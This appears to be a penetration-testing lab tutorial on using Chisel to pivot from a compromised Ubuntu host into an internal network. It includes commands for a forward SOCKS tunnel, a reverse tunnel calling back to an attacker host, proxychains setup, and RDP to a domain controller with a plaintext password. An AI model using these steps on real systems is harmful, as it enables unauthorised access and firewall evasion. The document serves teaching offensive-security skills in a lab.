Chisel is a TCP/UDP-based tunneling tool written in Go that uses HTTP to transport data that is secured using SSH. Chisel can create a client-server tunnel connection in a firewall restricted environment. Let us consider a scenario where we have to tunnel our traffic to a webserver on the 172.16.5.0/23 network (internal network). We have the Domain Controller with the address 172.16.5.19. This is not directly accessible to our attack host since our attack host and the domain controller belong to different network segments. However, since we have compromised the Ubuntu server, we can start a Chisel server on it that will listen on a specific port and forward our traffic to the internal network through the established tunnel.
Before we can use Chisel, we need to have it on our attack host. If we do not have Chisel on our attack host, we can clone the project repo using the command directly below:
git clone https://github.com/jpillora/chisel.gitWe will need the programming language Go installed on our system to build the Chisel binary. With Go installed on the system, we can move into that directory and use go build to build the Chisel binary.
Depending on the version of the glibc library installed on both (target and workstation) systems, there might be discrepancies that could result in an error. When this happens, it is important to compare the versions of the library on both systems, or we can use an older prebuilt version of chisel, which can be found in the Releases section of the GitHub repository.
cd chisel
go buildIt can be helpful to be mindful of the size of the files we transfer onto targets on our client’s networks, not just for performance reasons but also considering detection. Two beneficial resources to complement this particular concept are Oxdf’s blog post “Tunneling with Chisel and SSF” and IppSec’s walkthrough of the box Reddish. IppSec starts his explanation of Chisel, building the binary and shrinking the size of the binary at the 24:29 mark of his video.
Once the binary is built, we can use SCP to transfer it to the target pivot host.
Transferring Chisel Binary to Pivot Host
scp chisel ubuntu@10.129.202.64:~/Running the Chisel Server on the Pivot Host
./chisel server -v -p 1234 --socks5The Chisel listener will listen for incoming connections on port 1234 using SOCKS5 (--socks5) and forward it to all the networks that are accessible from the pivot host. In our case, the pivot host has an interface on the 172.16.5.0/23 network, which will allow us to reach hosts on that network.
Connecting to the Chisel Server
./chisel client -v 10.129.202.64:1234 socksAs you can see in the above output, the Chisel client has created a TCP/UDP tunnel via HTTP secured using SSH between the Chisel server and the client and has started listening on port 1080. Now we can modify our proxychains.conf file located at /etc/proxychains.conf and add 1080 port at the end so we can use proxychains to pivot using the created tunnel between the 1080 port and the SSH tunnel.
Editing & Confirming proxychains.conf
tail -f /etc/proxychains.conf
#
# proxy types: http, socks4, socks5
# ( auth types supported: "basic"-http "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
# socks4 127.0.0.1 9050
socks5 127.0.0.1 1080Pivoting to the DC
proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123Chisel Reverse Pivot
In the previous example, we used the compromised machine (Ubuntu) as our Chisel server, listing on port 1234. Still, there may be scenarios where firewall rules restrict inbound connections to our compromised target. In such cases, we can use Chisel with the reverse option.
When the Chisel server has --reverse enabled, remotes can be prefixed with R to denote reversed. The server will listen and accept connections, and they will be proxied through the client, which specified the remote. Reverse remotes specifying R:socks will listen on the server’s default socks port (1080) and terminate the connection at the client’s internal SOCKS5 proxy.
Starting the Chisel Server on our Attack Host
sudo ./chisel server --reverse -v -p 1234 --socks5Then we connect from the Ubuntu (pivot host) to our attack host, using the option R:socks
Connecting the Chisel Client to our Attack Host
./chisel client -v 10.10.14.17:1234 R:sockstail -f /etc/proxychains.conf
[ProxyList]
# add proxy here ...
# socks4 127.0.0.1 9050
socks5 127.0.0.1 1080 Note: If you are getting an error message with chisel on the target, try with a different version.